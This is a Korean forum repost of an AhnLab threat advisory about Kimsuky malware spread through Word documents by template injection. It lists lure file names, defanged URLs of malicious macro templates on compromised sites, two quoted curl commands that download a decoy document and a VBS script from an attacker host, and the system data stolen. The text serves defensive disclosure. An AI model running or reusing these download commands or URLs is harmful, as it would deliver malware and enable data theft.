<img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1390824249408914&amp;ev=PageView&amp;noscript=1"> 김수키 악성코드 유포 재개! 타겟은 방송사와 일반 기업 : 다나와 DPG는 내맘을 디피지

비교하고 잘 사는, 다나와 : 가격비교 사이트

다나와 앱
다나와 앱 서비스 목록
다나와 APP
다나와 가격비교 No.1 가격비교사이트 다나와 앱으로
간편하게 최저가를 확인하세요.
- -
QR코드
빈 이미지
다나와 앱 서비스 목록 닫기

김수키 악성코드 유포 재개! 타겟은 방송사와 일반 기업

IP
2023.02.09. 08:58:46
조회 수
434
8
댓글 수
22

공유하기

레이어 닫기

지금 보는 페이지가 마음에 든다면
공유하기를 통해 지인에게 소개해 주세요.

로그인 유저에게는 공유 활동에 따라
다나와 포인트가 지급됩니다.

자세히 >

URL이 복사되었습니다.
원하는 곳에 붙여넣기(Ctrl+V)하세요.

레이어 닫기

* 출처는 안립입니다.


최근 북한 해킹 조직 김수키(Kimsuky)가 만든 악성코드가 방송 및 일반 기업을 표적으로 삼고 있다. 이 악성코드는 올해 1월 10일 원고 청탁서로 위장해 안보 분야 종사자를 대상으로 유포된 바 있다. 이번에는 자기소개서, 앱 서비스 제안서 등의 형태로 유포되고 있으며, 기존과 동일하게 워드(Word) 문서 내 외부(External) 연결 기능으로 추가 악성 매크로를 실행하는 템플릿 인젝션(Template Injection) 기법이 사용됐다.

 


 

[그림 1] \word\_rels\settings.xml.rels 에서 확인된 External URL

 

유포가 확인된 파일명은 다음과 같다.

 

Ÿ   [kbs 일요진단]질문지.docx

Ÿ   임** 자기소개서.docx

Ÿ   app-planning – copy.docx

 


[그림 2] 정상 문서(1)


[그림 3] 정상 문서(2)

 


[그림 4] 정상 문서(3)

 

공격자는 악성 매크로 코드가 실행되도록 매크로 실행을 유도하는 이미지를 사용했다. 해당 이미지는 동일한 공격자가 과거부터 꾸준히 사용해 온 것으로 추정된다.

 

 

[그림 5] 매크로 실행을 유도하는 이미지

 

추가로 확인된 악성 워드 매크로 문서 다운로드 URL은 다음과 같다.

 

Ÿ   hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm

Ÿ   hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm

Ÿ   hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm

Ÿ   hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm

Ÿ   hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm

 

다운로드한 문서 파일에 포함된 악성 매크로가 실행되면 cURL(Client URL) 명령어가 포함된 version.bat 파일을 생성 및 실행한다. 이 배치 파일(*.bat)에는 정상 문서와 추가 악성 스크립트 다운로드 및 실행 코드가 들어있다. cURL 명령어는 통신 프로토콜을 이용해 서버에 데이터를 전송하거나 가져올 때 사용하기 위한 명령 줄 툴 및 라이브러리로, 이번 공격에는 아래 2가지가 사용됐다.

 

Ÿ   curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx

Ÿ   curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

 

추가 악성 스크립트는 아래의 정보를 C&C 서버로 유출한다.

 

Ÿ   감염 PC 시스템 정보

Ÿ   시스템에 설치된 바이러스 백신 정보

Ÿ   최근 연 워드 문서 목록

Ÿ   시스템 내 다운로드 폴더 경로 정보

Ÿ   실행 중인 프로세스 정보

Ÿ   IE 관련 레지스트리키 수정

Ÿ   C&C 서버 연결 지속성을 위한 작업 스케줄러 등록

 

* 전체내용은 아래에서 확인하세요.

https://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?seq=33107&utm_source=CM&utm_medium=eDM&utm_campaign=SL%5FtypeC&utm_content=955

공감/비공감

공감/비공감안내도움말 보기
유용하고 재미있는 정보인가요?
공감이 된다면 공감 버튼을, 그렇지 않다면 비공감 버튼을 눌러 주세요!
공감이나 비공감을 선택 하는 경우 다나와 포인트를 적립해 드립니다. ※ 공감 버튼의 총 선택 횟수는 전체 공개입니다. 비공감 버튼의 선택 여부는 선택한 본인만 알 수 있습니다.

plc-wave 님의 다른 글 보기

1/8
자유게시판 최신 글 전체 둘러보기
1/1
자고자고 또잔 일요일이네요
일요일 저녁이네요 (3)
최근 공개된 북한 해커 얼굴 (4)
알리 배송이 이제 정상화 된것 같네요. (8)
[주간랭킹] 지난 주 다나와 주간활동 순위는 전주 대비 19계단 상승한 2위였습니다. (9)
올해는 알레르기 너무 심하네... (11)
폴란드, 실종된 2살 아이를 찾기 위해 만들어진 인간 사슬 (12)
지난 주 주간 랭킹보다 13계단 내려가서 27위네요. (11)
습도 높고 선선한 날씨에 일요일이네요. (7)
3주건너 4주만에 된 활동순위 48위 (10)
늦잠 자고 싶은.... (10)
자식은 부모의 마음을 알아주기만 해도 됩니다 (10)
저희 집은 밤마다 모기와의 전쟁인데 다들 괜찮으신가요? (19)
[지나가는 타임] 지난주 랭킹. ~ (13)
이번주는 15위로 마감했네요. (20)
포켓몬이 함께하는 유산균 세트! (8)
연휴 마지막날입니다. (12)
10월 10일 박스오피스 (8)
하루가 빠르게 지나가버렸습니다 (10)
토요일도 가는군요 (7)
이 시간 HOT 댓글!
1/4